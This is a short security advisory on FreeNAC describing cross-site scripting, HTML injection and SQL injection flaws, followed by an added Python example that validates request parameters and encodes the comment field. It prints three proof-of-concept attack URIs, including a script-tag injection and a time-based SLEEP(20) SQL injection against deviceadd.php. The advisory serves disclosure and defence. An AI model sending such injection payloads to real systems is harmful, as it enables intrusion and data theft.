FreeNAC Multiple Cross Site Scripting, HTML Injection and SQL Injection Vulnerabilities

An attacker can exploit these issues through a browser. An attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issues.

The following example URIs are available.

Cross-site scripting:

http://www.example.com/stats.php?graphtype=bar&type=vlan13<script>alert(1)</script>

HTML-injection:

http://www.example.com/deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment="><script>alert(2)</script>&action=Update&action_idx=1

SQL-Injection:

http://www.example.com/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1
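A server-side check for the parameters shown in the example URIs above, as an added example that is not FreeNAC code and not part of the original advisory. The per-parameter formats in SCHEMA are assumptions inferred from the benign values in those URIs, and the function names are hypothetical.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Assumed per-parameter formats, inferred from the benign values in the
# advisory's example URIs; FreeNAC's real schema may differ.
SCHEMA = {
    "graphtype": re.compile(r"[a-z]{1,16}"),
    "type": re.compile(r"[A-Za-z0-9_]{1,32}"),
    "name": re.compile(r"[\w.-]{1,64}"),
    "mac": re.compile(r"[0-9A-Fa-f]{4}(\.[0-9A-Fa-f]{4}){2}"),
    "status": re.compile(r"\d{1,4}"),
    "vlan": re.compile(r"\d{1,4}"),
    "username": re.compile(r"\d{1,10}"),
    "office": re.compile(r"\d{1,10}"),
    "action": re.compile(r"[A-Za-z]{1,16}"),
    "action_idx": re.compile(r"\d{1,4}"),
}
FREE_TEXT = {"comment"}  # cannot be allow-listed; must be encoded on output


def rejected_params(uri):
    """Return the sorted names of parameters that fail validation."""
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    bad = set()
    for name, values in query.items():
        if name in FREE_TEXT:
            continue
        pattern = SCHEMA.get(name)  # unknown parameter names are rejected
        for value in values:
            if pattern is None or not pattern.fullmatch(value):
                bad.add(name)
    return sorted(bad)


def render_comment(uri):
    """HTML-encode the free-text comment before it is placed in a page."""
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    return html.escape(query.get("comment", [""])[0], quote=True)


if __name__ == "__main__":
    # Input: the advisory's SQL-injection example URI.
    uri = ("http://www.example.com/deviceadd.php?name=test&mac=0001.0001.0001"
           "&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment="
           "&action=Update&action_idx=1")
    print(rejected_params(uri))
```

Validation only narrows what reaches the application; the SQL injection itself is closed by binding `status` as a query parameter instead of concatenating it into the statement.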


 

Copyright 2010, SecurityFocus